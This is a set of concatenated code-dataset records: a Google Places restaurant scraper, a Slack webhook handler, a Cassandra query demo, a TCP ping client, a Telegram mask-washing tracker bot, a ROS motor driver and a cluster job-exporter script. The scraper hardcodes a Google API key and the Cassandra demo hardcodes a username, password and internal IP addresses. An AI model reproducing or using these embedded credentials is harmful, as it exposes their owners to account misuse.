result_type=None, location_type=None,\r\n language=None):\r\n \"\"\"\r\n Reverse geocoding is the process of converting geographic coordinates into a\r\n human-readable address.\r\n :param latlng: The latitude/longitude value or place_id for which you wish\r\n to obtain the closest, human-readable address.\r\n :type latlng: string, dict, list, or tuple\r\n :param result_type: One or more address types to restrict results to.\r\n :type result_type: string or list of strings\r\n :param location_type: One or more location types to restrict results to.\r\n :type location_type: list of strings\r\n :param language: The language in which to return results.\r\n :type language: string\r\n :rtype: list of reverse geocoding results.\r\n \"\"\"\r\n\r\n # Check if latlng param is a place_id string.\r\n # place_id strings do not contain commas; latlng strings do.\r\n if convert.is_string(latlng) and ',' not in latlng:\r\n params = {\"place_id\": latlng}\r\n else:\r\n params = {\"latlng\": convert.latlng(latlng)}\r\n\r\n if result_type:\r\n params[\"result_type\"] = convert.join_list(\"|\", result_type)\r\n\r\n if location_type:\r\n params[\"location_type\"] = convert.join_list(\"|\", location_type)\r\n\r\n if language:\r\n params[\"language\"] = language\r\n\r\n return client._request(\"/maps/api/geocode/json\", params).get(\"results\", [])\r\n\r\n\r\n\r\ndef _places(client, url_part, query=None, location=None, radius=None,\r\n keyword=None, language=None, min_price=0, max_price=4, name=None,\r\n open_now=False, rank_by=None, type=None, region=None, page_token=None):\r\n \"\"\"\r\n Internal handler for ``places``, ``places_nearby``, and ``places_radar``.\r\n See each method's docs for arg details.\r\n \"\"\"\r\n\r\n params = {\"minprice\": min_price, \"maxprice\": max_price}\r\n\r\n if query:\r\n params[\"query\"] = query\r\n if location:\r\n params[\"location\"] = convert.latlng(location)\r\n if radius:\r\n params[\"radius\"] = radius\r\n if keyword:\r\n params[\"keyword\"] = keyword\r\n if language:\r\n params[\"language\"] = language\r\n if name:\r\n params[\"name\"] = convert.join_list(\" \", name)\r\n if open_now:\r\n params[\"opennow\"] = \"true\"\r\n if rank_by:\r\n params[\"rankby\"] = rank_by\r\n if type:\r\n params[\"type\"] = type\r\n if region:\r\n params[\"region\"] = region\r\n if page_token:\r\n params[\"pagetoken\"] = page_token\r\n\r\n url = \"/maps/api/place/%ssearch/json\" % url_part\r\n return client._request(url, params)\r\n\r\n\r\ndef places(client, query, location=None, radius=None, language=None,\r\n min_price=None, max_price=None, open_now=False, type=None, region=None,\r\n page_token=None):\r\n \"\"\"\r\n Places search.\r\n :param query: The text string on which to search, for example: \"restaurant\".\r\n :type query: string\r\n :param location: The latitude/longitude value for which you wish to obtain the\r\n closest, human-readable address.\r\n :type location: string, dict, list, or tuple\r\n :param radius: Distance in meters within which to bias results.\r\n :type radius: int\r\n :param language: The language in which to return results.\r\n :type language: string\r\n :param min_price: Restricts results to only those places with no less than\r\n this price level. Valid values are in the range from 0 (most affordable)\r\n to 4 (most expensive).\r\n :type min_price: int\r\n :param max_price: Restricts results to only those places with no greater\r\n than this price level. Valid values are in the range from 0 (most\r\n affordable) to 4 (most expensive).\r\n :type max_price: int\r\n :param open_now: Return only those places that are open for business at\r\n the time the query is sent.\r\n :type open_now: bool\r\n :param type: Restricts the results to places matching the specified type.\r\n The full list of supported types is available here:\r\n https://developers.google.com/places/supported_types\r\n :type type: string\r\n :param region: The region code, optional parameter.\r\n See more @ https://developers.google.com/places/web-service/search\r\n :type region: string\r\n :param page_token: Token from a previous search that when provided will\r\n returns the next page of results for the same search.\r\n :type page_token: string\r\n :rtype: result dict with the following keys:\r\n results: list of places\r\n html_attributions: set of attributions which must be displayed\r\n next_page_token: token for retrieving the next page of results\r\n \"\"\"\r\n return _places(client, \"text\", query=query, location=location,\r\n radius=radius, language=language, min_price=min_price,\r\n max_price=max_price, open_now=open_now, type=type, region=region,\r\n page_token=page_token)\r\n\r\n\r\ndef main():\r\n \r\n gmaps = googlemaps.Client(key='AIzaSyBWiZYIb2Jt715QJmla51ZKcx03OkSOmfg')\r\n\r\n g = geocoder.ip('me')\r\n\r\n latlng = g.latlng\r\n\r\n #latlng = [39.947141, -105.056640] #Broomfield, CO\r\n # latlng = [40.005657, -105.264368] #Boulder, CO\r\n\r\n american = places(gmaps, \"american food\", latlng)\r\n pizza = places(gmaps, \"pizza\", latlng)\r\n italian = places(gmaps, \"italian food\", latlng)\r\n chinese = places(gmaps, \"chinese food\", latlng)\r\n mexican = places(gmaps, \"mexican food\", latlng)\r\n indian = places(gmaps, \"indian food\", latlng)\r\n sandwiches = places(gmaps, \"sandwiches\", latlng)\r\n\r\n\r\n\t# print(latlng)\r\n\r\n with open('newRestaurants.csv', mode='w', newline='') as csv_file:\r\n fieldnames = ['name', 'category','rating', 'address', 'lat', 'long']\r\n writer = csv.writer(csv_file, delimiter='\"')\r\n\r\n for i in range(20):\r\n\t \t#distance = haversine(latlng[0], latlng[1], american['results'][i]['geometry']['location']['lat'], american['results'][i]['geometry']['location']['lng'])\r\n name = american['results'][i]['name']\r\n category = 'American'\r\n rating = american['results'][i]['rating']\r\n address = american['results'][i]['formatted_address']\r\n lat = american['results'][i]['geometry']['location']['lat']\r\n lng = american['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], chinese['results'][i]['geometry']['location']['lat'], chinese['results'][i]['geometry']['location']['lng'])\r\n name = chinese['results'][i]['name']\r\n category = 'Chinese'\r\n rating = chinese['results'][i]['rating']\r\n address = chinese['results'][i]['formatted_address']\r\n lat = chinese['results'][i]['geometry']['location']['lat']\r\n lng = chinese['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], indian['results'][i]['geometry']['location']['lat'], indian['results'][i]['geometry']['location']['lng'])\r\n name = indian['results'][i]['name']\r\n category = 'Indian'\r\n rating = indian['results'][i]['rating']\r\n address = indian['results'][i]['formatted_address']\r\n lat = indian['results'][i]['geometry']['location']['lat']\r\n lng = indian['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], italian['results'][i]['geometry']['location']['lat'], italian['results'][i]['geometry']['location']['lng'])\r\n name = italian['results'][i]['name']\r\n category = 'Italian'\r\n rating = italian['results'][i]['rating']\r\n address = italian['results'][i]['formatted_address']\r\n lat = italian['results'][i]['geometry']['location']['lat']\r\n lng = italian['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], mexican['results'][i]['geometry']['location']['lat'], mexican['results'][i]['geometry']['location']['lng'])\r\n name = mexican['results'][i]['name']\r\n category = 'Mexican'\r\n rating = mexican['results'][i]['rating']\r\n address = mexican['results'][i]['formatted_address']\r\n lat = mexican['results'][i]['geometry']['location']['lat']\r\n lng = mexican['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], pizza['results'][i]['geometry']['location']['lat'], pizza['results'][i]['geometry']['location']['lng'])\r\n name = pizza['results'][i]['name']\r\n category = 'Pizza'\r\n rating = pizza['results'][i]['rating']\r\n address = pizza['results'][i]['formatted_address']\r\n lat = pizza['results'][i]['geometry']['location']['lat']\r\n lng = pizza['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\r\n for i in range(20):\r\n #distance = haversine(latlng[0], latlng[1], sandwiches['results'][i]['geometry']['location']['lat'], sandwiches['results'][i]['geometry']['location']['lng'])\r\n name = sandwiches['results'][i]['name']\r\n category = 'Sandwiches'\r\n rating = sandwiches['results'][i]['rating']\r\n address = sandwiches['results'][i]['formatted_address']\r\n lat = sandwiches['results'][i]['geometry']['location']['lat']\r\n lng = sandwiches['results'][i]['geometry']['location']['lng']\r\n writer.writerow([name, category, rating, address, lat, lng])\r\n\t\t\r\n\r\n \r\n\r\n #done gathering data. Run C++ program\r\n\r\n\r\n # testRestaurant = \"River and Woods\"\r\n\r\n # os.system(\"a.exe \" + testRestaurant)\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"finalProject/structures/terminalUI/combinedPlacesAPI.py","file_name":"combinedPlacesAPI.py","file_ext":"py","file_size_in_byte":13724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651296974","text":"# coding: utf-8\n# \nimport os\nimport requests\n\ndef post_to_slack(event, context):\n # This name has to match what we have in the serverless.yml\n slack_webhook_url = os.environ['SLACK_WEBHOOK_URL'] # The os module allows us to grab env vars\n \n # The \"event\" in the function definition above is a dictionary\n # so we can use the glob operatio (**) to say send the entire dictionary to format()\n # then we can pick out whatever fields we want\n # Format looks inside the event dictionary for the fields\n slack_message = \"From {source} at {detail[StartTime]}: {detail[Description]}\".format(**event) \n data = { \"text\": slack_message }\n requests.post(slack_webhook_url, json=data)\n\n # No longer need to print out the event \n # print(slack_webhook_url)\n # print(event)\n \n return\n","sub_path":"02-notifon/notifier/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"436345970","text":"from defainHealth import *\n\nyear = inputNumber(\"西暦 => \", 1900, 9999)\nmonth = inputNumber(\"月 => \", 1, 12)\nday = inputNumber(\"日 => \", 1, LastDayOfTheMonth(year, month))\n\nf_month, f_day = calc(year, month-1, day + 25)\ne_month, e_day = calc(year, month-1, day + 38)\n\nprint(\"正常 >> \" + str(f_month) + \"月\" + str(f_day) + \"日〜\" + str(e_month) + \"月\" + str(e_day) + \"日\")\n\nif e_month == f_month:\n flag = 1\nelse:\n flag = 2\n\nfor i in range(0, flag):\n cnt = countLeapYear(year)\n days = countAllDays(year, f_month + i, cnt)\n blank = (days + 1) % 7\n printCalendar(year, f_month + i, blank)","sub_path":"Health/checkHealthCalendar.py","file_name":"checkHealthCalendar.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"62895895","text":"#!/usr/bin/env python\n\nimport itertools\nfrom multiprocessing import Pool\nimport sys\nimport time\n\nfrom cassandra import ConsistencyLevel\nfrom cassandra.auth import PlainTextAuthProvider\nfrom cassandra.cluster import Cluster\nfrom cassandra.concurrent import execute_concurrent_with_args\nfrom cassandra.query import tuple_factory\n\n\ndef query_gen(n):\n # l = [('local') for x in range(n)]\n # print(l)\n for _ in range(n):\n yield ('local', )\n # return l\n\n\nclass QueryManager(object):\n\n concurrency = 100 # chosen to match the default in execute_concurrent_with_args\n\n def __init__(self, cluster, process_count=None):\n self.pool = Pool(processes=process_count, initializer=self._setup, initargs=(cluster,))\n print(\"Pool was built\")\n\n\n\n @classmethod\n def _setup(cls, cluster=None):\n auth_provider = PlainTextAuthProvider(username=\"statimreadwrite1\", password=\"st@tim123\")\n cluster = Cluster(\n contact_points=\"10.203.166.247,10.203.166.251,10.203.166.252,10.203.167.12,10.203.167.14,10.203.166.231\".split(\n \",\"),\n port=\"9042\",\n auth_provider=auth_provider,\n protocol_version=3\n )\n cls.session = cluster.connect()\n cls.session.default_timeout = 900\n cls.session.consistency_level = ConsistencyLevel.LOCAL_QUORUM\n # cls.session.set_keyspace(\"hl_supplemental_data\")\n cls.session.row_factory = tuple_factory\n cls.prepared = cls.session.prepare('SELECT * FROM system.local WHERE key=?')\n print(\"Cluster and session was built\")\n\n def close_pool(self):\n self.pool.close()\n self.pool.join()\n\n def get_results(self, params):\n # params = list(params)\n results = self.pool.map(_multiprocess_get, params)\n return list(itertools.chain(*results))\n\n @classmethod\n def _results_from_concurrent(cls, params):\n print(\"_results_from_concurrent was called with params\", params)\n # return [results[1] for results in execute_concurrent_with_args(cls.session, cls.prepared, params)]\n return execute_concurrent_with_args(cls.session, cls.prepared, params)\n\ndef _multiprocess_get(params):\n print(\"_multiprocess_get was called\",params)\n return QueryManager._results_from_concurrent(params)\n\n\nif __name__ == '__main__':\n iterations = 20\n processes = 4\n\n # cluster = Cluster()\n qm = QueryManager(processes)\n start = time.time()\n rows = qm.get_results(query_gen(iterations))\n delta = time.time() - start\n print (\"%d queries in %s seconds (%s/s)\" % (iterations, delta, iterations / delta))\n # print(query_gen(10))","sub_path":"CassandraDemo/syslocalmultiproc.py","file_name":"syslocalmultiproc.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"318905467","text":"import socket\nimport sys\nimport socket\nimport time\nimport random\nimport string\nimport errno\nfrom socket import error as socket_error\nfrom ClientBase import ClientBase\nfrom ClientBase import randomString\n\nclass tcpClient(ClientBase):\n def __init__(self, _ip, _port, _numPings = 4, _payloadSize = 64, _timeout = 1):\n super().__init__( _ip, _port, socket.SOCK_STREAM, _payloadSize, _numPings, _timeout)\n\n def ping(self): \n self.prePingOps()\n with socket.socket(socket.AF_INET, self.protocol) as sock:\n # send the data to the server\n try:\n sock.settimeout(self.timeout)\n self.pingPktsTx += 1\n sock.connect((self.serverIp, self.serverPort))\n msg = randomString(self.payloadSize)\n sock.sendall(bytes(msg + \"\\n\", \"utf-8\"))\n except socket.error as error:\n self.errorHandler(error)\n return\n # receive the data from the server\n try:\n received = str(sock.recv(self.rxBuffer), \"utf-8\")\n except socket.error as error:\n self.errorHandler(error)\n return\n self.postPingOps(received)\n\ndef main():\n c1 = tcpClient(\"127.0.0.1\", 9000)\n c1.routine()\n\nif __name__== \"__main__\":\n main()\n","sub_path":"TcpClient.py","file_name":"TcpClient.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"364105072","text":"\r\n## Imports\r\nimport logging\r\nfrom telegram import Update, ReplyKeyboardMarkup, ReplyKeyboardRemove\r\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters\r\n\r\n## Insert token here\r\nTOKEN = \"\"\r\n\r\n## Enable logging\r\nlogging.basicConfig(\r\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\r\n)\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n## Command for /start\r\ndef start(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text(\"Hi! This is a bot to track the number of times you have washed your mask. Use: \\n /add mask_name max_washes to start tracking a new mask \\n /remove to stop tracking a mask \\n /wash after you have washed the mask. \\n /help for information on additional commands.\",parse_mode ='HTML')\r\n\r\ndef help(update: Update, context:\r\n CallbackContext) -> None:\r\n update.message.reply_text(\"You can use: \\n /editname old_name new_name to change the name of your mask.\\n /editcurrent mask_name current_washes can be used to change the number of times the mask has been washed. \\n /editmax mask_name max_washes to change the max number of washes for the mask.\",parse_mode='HTML')\r\n\r\nd={}\r\ndef add(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n try:\r\n maskname = context.args[0]\r\n except IndexError:\r\n update.message.reply_text(\"Please enter a valid input, e.g. /add DET 50\", parse_mode=\"HTML\")\r\n return\r\n try:\r\n max_number = int(context.args[1])\r\n except IndexError:\r\n update.message.reply_text(\"Please enter a valid input, e.g. /add DET 50\", parse_mode=\"HTML\")\r\n except ValueError:\r\n update.message.reply_text(\"Please enter a valid input, e.g. /add DET 50\", parse_mode=\"HTML\")\r\n\r\n if user.username not in d:\r\n d[user.username] = {}\r\n if maskname not in d[user.username]:\r\n d[user.username][maskname]=[0,max_number]\r\n update.message.reply_text(f\"{maskname} successfully added!\")\r\n else:\r\n update.message.reply_text(f\"{maskname} is already added, please choose a different name.\")\r\n\r\n## Command for /wash\r\ndef wash(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n try:\r\n if not d[user.username].keys():\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n else:\r\n reply_keyboard=[d[user.username].keys()]\r\n update.message.reply_text(\"Please choose a mask.\",reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\r\n except KeyError:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n\r\n## Message handler for wash\r\ndef chosen_wash(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n maskname = update.message.text\r\n\r\n try:\r\n d[user.username][maskname][0]+=1\r\n update.message.reply_text(f\"{maskname} has been washed {d[user.username][maskname][0]}/{d[user.username][maskname][1]} times.\")\r\n\r\n except KeyError:\r\n update.message.reply_text(\"You have not added this mask yet!\")\r\n else:\r\n if d[user.username][maskname][0] >= d[user.username][maskname][1]:\r\n update.message.reply_text(f\"{maskname} has been fully utilized, please dispose this mask and add another mask!\")\r\n\r\n## Command for /remove\r\ndef remove(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n reply_keyboard=[[\"remove \"+ i for i in d[user.username].keys()]]\r\n update.message.reply_text(\"Please choose a mask to remove.\",reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))\r\n\r\n## Message handler for remove\r\ndef chosen_remove(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n maskname = update.message.text.replace(\"remove \",\"\")\r\n try:\r\n if maskname in d[user.username]:\r\n del d[user.username][maskname]\r\n update.message.reply_text(f\"{maskname} has been removed!\")\r\n else:\r\n update.message.reply_text(f\"{maskname} not found!\")\r\n except KeyError:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n\r\n\r\n## Command for /view\r\ndef view(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n try:\r\n if not d[user.username]:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command to do so.\")\r\n for i in d[user.username]:\r\n update.message.reply_text(f\"{i} has been washed {d[user.username][i][0]}/{d[user.username][i][1]} times.\")\r\n except KeyError:\r\n update.message.reply_text(\"You have not added any masks, please use the /add command.\")\r\n\r\n## Command for editname\r\ndef editname(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n old_name=context.args[0]\r\n new_name=context.args[1]\r\n try:\r\n d[user.username][new_name]=d[user.username][old_name]\r\n del d[user.username][old_name]\r\n update.message.reply_text(\"Mask name has been updated!\")\r\n except KeyError:\r\n update.message.reply_text(\"This mask does not exist!\")\r\n\r\n## Command for editcurrent\r\ndef editcurrent(update: Update, context: CallbackContext):\r\n user = update.message.from_user\r\n name = context.args[0]\r\n try:\r\n new_wash = int(context.args[1])\r\n d[user.username][name][0] = new_wash\r\n update.message.reply_text(\"Current mask wash has been updated!\")\r\n\r\n if new_wash>=d[user.username][name][1]:\r\n update.message.reply_text(f\"{name} has been fully utilized, please dispose this mask and add another mask!\")\r\n except KeyError:\r\n update.message.reply_text(\"This mask does not exist!\")\r\n except ValueError:\r\n update.message.reply_text(\"Please enter a valid input, eg. /editcurrent DET 33\",parse_mode = \"HTML\")\r\n\r\n\r\n## Command for editmax\r\ndef editmax(update: Update, context: CallbackContext):\r\n user=update.message.from_user\r\n name = context.args[0]\r\n try:\r\n new_max = int(context.args[1])\r\n d[user.username][name][1]=new_max\r\n update.message.reply_text(\"Maximum number of washes has been updated!\")\r\n except KeyError:\r\n update.message.reply_text(\"Mask does not exist!\")\r\n except ValueError:\r\n update.message.reply_text(\"Please enter a valid input, eg. /editmax DET 50\",parse_mode = 'HTML')\r\n\r\n\r\ndef main():\r\n \"\"\"Run bot.\"\"\"\r\n # Updater with bot's token\r\n updater = Updater(TOKEN, use_context=True)\r\n\r\n # Dispatcher to register handlers\r\n dispatcher = updater.dispatcher\r\n\r\n # Command handlers and message handlers\r\n dispatcher.add_handler(CommandHandler(\"start\",start))\r\n dispatcher.add_handler(CommandHandler(\"help\",help))\r\n dispatcher.add_handler(CommandHandler(\"add\", add))\r\n\r\n dispatcher.add_handler(CommandHandler(\"wash\", wash))\r\n\r\n dispatcher.add_handler(CommandHandler(\"remove\", remove))\r\n dispatcher.add_handler(MessageHandler(Filters.regex(\"^remove\") & ~Filters.command, chosen_remove))\r\n\r\n #dispatcher.add_handler(CommandHandler(\"peep\", peep))\r\n dispatcher.add_handler(CommandHandler(\"view\",view))\r\n\r\n dispatcher.add_handler(CommandHandler(\"editname\",editname))\r\n dispatcher.add_handler(CommandHandler(\"editcurrent\",editcurrent))\r\n dispatcher.add_handler(CommandHandler(\"editmax\",editmax))\r\n\r\n dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, chosen_wash))\r\n\r\n # Start the Bot\r\n updater.start_polling()\r\n\r\n # Block until you press Ctrl-C or the process receives SIGINT, SIGTERM or\r\n # SIGABRT. This should be used most of the time, since start_polling() is\r\n # non-blocking and will stop the bot gracefully.\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"bot_temp.py","file_name":"bot_temp.py","file_ext":"py","file_size_in_byte":8015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"154473399","text":"#!/usr/bin/env python\n\n## This program subscribes to /key_vel topic to read Twist messages\n# An if-else function sets the motor speeds based on these messages\n__author__ = \"Victor Freire, Rebecca Roembke, Wanyue Xu\"\n__email__ = \"freiremelgiz@wisc.edu\"\n\n# Dependencies\nimport rospy\nfrom pololu_drv8835_rpi import motors\nfrom geometry_msgs.msg import Twist\n\n## INIT Objects\n# Initialize node\nrospy.init_node('driver', anonymous=False)\n\n## Read the state of the keyboard and set motor speed\n# \"Arcade\" driving\ndef set_speed(msg):\n if(msg.linear.x == 5.0):\n motors.motor1.setSpeed(-200)\n motors.motor2.setSpeed(200)\n elif(msg.linear.x == -5.0):\n motors.motor1.setSpeed(200)\n motors.motor2.setSpeed(-200)\n elif(msg.angular.z == -1.0):\n motors.motor1.setSpeed(150)\n motors.motor2.setSpeed(150)\n elif(msg.angular.z == 1.0):\n motors.motor1.setSpeed(-150)\n motors.motor2.setSpeed(-150)\n else:\n motors.motor1.setSpeed(0)\n motors.motor2.setSpeed(0)\n\n\n# Listens Twist data continuously when called\ndef listener():\n # Create Subscriber for drive commands\n sub = rospy.Subscriber('/key_vel', Twist, set_speed)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n listener()\n except rospy.ROSInterruptException:\n # Stop motors on error\n motors.motor1.setSpeed(0)\n motors.motor2.setSpeed(0)\n pass\n","sub_path":"src/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"357964220","text":"#!/usr/bin/env python3\n\nprint('Test9.2a')\n\ntrunk_dict={'FastEthernet0/1':[10,20],\n 'FastEthernet0/2':[11,30],\n 'FastEthernet0/4':[17]}\n\ntrunk_template = ['switchport trunk encapsulation dot1q',\n 'switchport mode trunk',\n 'switchport trunk native vlan 999',\n 'switchport trunk allowed vlan']\n\ndef generate_trunk_config(trunk):\n ''' \n trunk - словарь trunk-портов для которых необходимо сгенерировать конфигурацию.\n Возвращает список всех команд, которые были сгенерированы на основе шаблона\n '''\n \n tr_keys=[]\n for intr in trunk:\n tr_keys.append(intr)\n result=dict.fromkeys(tr_keys)\n\n for intr in trunk:\n output=[]\n for line in trunk_template:\n if line.endswith('allowed vlan'):\n addline=line + ' ' + str(trunk[intr]).strip('[]')\n output.append(addline)\n else:\n output.append(line)\n result[intr]=output\n return result\n\nprint(generate_trunk_config(trunk_dict))\n","sub_path":"Test09/test9.2a.py","file_name":"test9.2a.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"75245081","text":"#!/usr/bin/python\n# Copyright (c) Microsoft Corporation\n# All rights reserved.\n#\n# MIT License\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport copy\nimport sys\nimport time\nimport logging\n\nimport docker_stats\nimport docker_inspect\nimport gpu_exporter\nimport network\nimport utils\nfrom utils import Metric\n\nlogger = logging.getLogger(__name__)\n\n\n# k8s will prepend \"k8s_\" to pod name. There will also be a container name prepend with \"k8s_POD_\"\n# which is a docker container used to construct network & pid namespace for specific container. These\n# container prepend with \"k8s_POD\" consume nothing.\npai_services = map(lambda s: \"k8s_\" + s, [\n \"rest-server\",\n \"pylon\",\n \"webportal\",\n \"grafana\",\n \"prometheus\",\n \"alertmanager\",\n \"watchdog\",\n \"end-to-end-test\",\n \"yarn-frameworklauncher\",\n \"hadoop-jobhistory-service\",\n \"hadoop-name-node\",\n \"hadoop-node-manager\",\n \"hadoop-resource-manager\",\n \"hadoop-data-node\",\n \"zookeeper\",\n \"node-exporter\",\n \"job-exporter\",\n \"yarn-exporter\",\n \"nvidia-drivers\"\n])\n\ndef parse_from_labels(labels):\n gpuIds = []\n otherLabels = {}\n\n for key, val in labels.items():\n if \"container_label_GPU_ID\" == key:\n s2 = val.replace(\"\\\"\", \"\").split(\",\")\n for id in s2:\n if id:\n gpuIds.append(id)\n else:\n otherLabels[key] = val\n\n return gpuIds, otherLabels\n\n\ndef collect_job_metrics(gpu_infos, all_conns):\n stats = docker_stats.stats()\n if stats is None:\n logger.warning(\"docker stats returns None\")\n return None\n\n result = []\n for container_id, stats in stats.items():\n pai_service_name = None\n\n # TODO speed this up, since this is O(n^2)\n for service_name in pai_services:\n if stats[\"name\"].startswith(service_name):\n pai_service_name = service_name[4:] # remove \"k8s_\" prefix\n break\n\n inspect_info = docker_inspect.inspect(container_id)\n pid = inspect_info[\"pid\"] if inspect_info is not None else None\n inspect_labels = utils.walk_json_field_safe(inspect_info, \"labels\")\n\n if not inspect_labels and pai_service_name is None:\n continue # other container, maybe kubelet or api-server\n\n # get network consumption, since all our services/jobs running in host network,\n # network statistic from docker is not specific to that container. We have to\n # get network statistic by ourselves.\n lsof_result = network.lsof(pid)\n net_in, net_out = network.get_container_network_metrics(all_conns, lsof_result)\n if logger.isEnabledFor(logging.DEBUG):\n debug_info = utils.check_output(\"ps -o cmd fp {0} | tail -n 1\".format(pid), shell=True)\n\n logger.debug(\"pid %s with cmd `%s` has lsof result %s, in %d, out %d\",\n pid, debug_info, lsof_result, net_in, net_out)\n\n if pai_service_name is None:\n gpuIds, otherLabels = parse_from_labels(inspect_info[\"labels\"])\n otherLabels.update(inspect_info[\"env\"])\n\n for id in gpuIds:\n if gpu_infos:\n labels = copy.deepcopy(otherLabels)\n labels[\"minor_number\"] = id\n\n result.append(Metric(\"container_GPUPerc\", labels, gpu_infos[id][\"gpuUtil\"]))\n result.append(Metric(\"container_GPUMemPerc\", labels, gpu_infos[id][\"gpuMemUtil\"]))\n\n result.append(Metric(\"container_CPUPerc\", otherLabels, stats[\"CPUPerc\"]))\n result.append(Metric(\"container_MemUsage\", otherLabels, stats[\"MemUsage_Limit\"][\"usage\"]))\n result.append(Metric(\"container_MemLimit\", otherLabels, stats[\"MemUsage_Limit\"][\"limit\"]))\n result.append(Metric(\"container_NetIn\", otherLabels, net_in))\n result.append(Metric(\"container_NetOut\", otherLabels, net_out))\n result.append(Metric(\"container_BlockIn\", otherLabels, stats[\"BlockIO\"][\"in\"]))\n result.append(Metric(\"container_BlockOut\", otherLabels, stats[\"BlockIO\"][\"out\"]))\n result.append(Metric(\"container_MemPerc\", otherLabels, stats[\"MemPerc\"]))\n else:\n labels = {\"name\": pai_service_name}\n result.append(Metric(\"service_cpu_percent\", labels, stats[\"CPUPerc\"]))\n result.append(Metric(\"service_mem_usage_byte\", labels, stats[\"MemUsage_Limit\"][\"usage\"]))\n result.append(Metric(\"service_mem_limit_byte\", labels, stats[\"MemUsage_Limit\"][\"limit\"]))\n result.append(Metric(\"service_mem_usage_percent\", labels, stats[\"MemPerc\"]))\n result.append(Metric(\"service_net_in_byte\", labels, net_in))\n result.append(Metric(\"service_net_out_byte\", labels, net_out))\n result.append(Metric(\"service_block_in_byte\", labels, stats[\"BlockIO\"][\"in\"]))\n result.append(Metric(\"service_block_out_byte\", labels, stats[\"BlockIO\"][\"out\"]))\n\n return result\n\ndef main(argv):\n log_dir = argv[0]\n gpu_metrics_path = log_dir + \"/gpu_exporter.prom\"\n job_metrics_path = log_dir + \"/job_exporter.prom\"\n time_sleep_s = int(argv[1])\n\n iter = 0\n\n singleton = utils.Singleton(gpu_exporter.collect_gpu_info)\n\n while True:\n try:\n logger.info(\"job exporter running {0} iteration\".format(str(iter)))\n iter += 1\n gpu_infos = singleton.try_get()\n\n gpu_metrics = gpu_exporter.convert_gpu_info_to_metrics(gpu_infos)\n utils.export_metrics_to_file(gpu_metrics_path, gpu_metrics)\n\n all_conns = network.iftop()\n logger.debug(\"iftop result is %s\", all_conns)\n\n # join with docker stats metrics and docker inspect labels\n job_metrics = collect_job_metrics(gpu_infos, all_conns)\n utils.export_metrics_to_file(job_metrics_path, job_metrics)\n except Exception as e:\n logger.exception(\"exception in job exporter 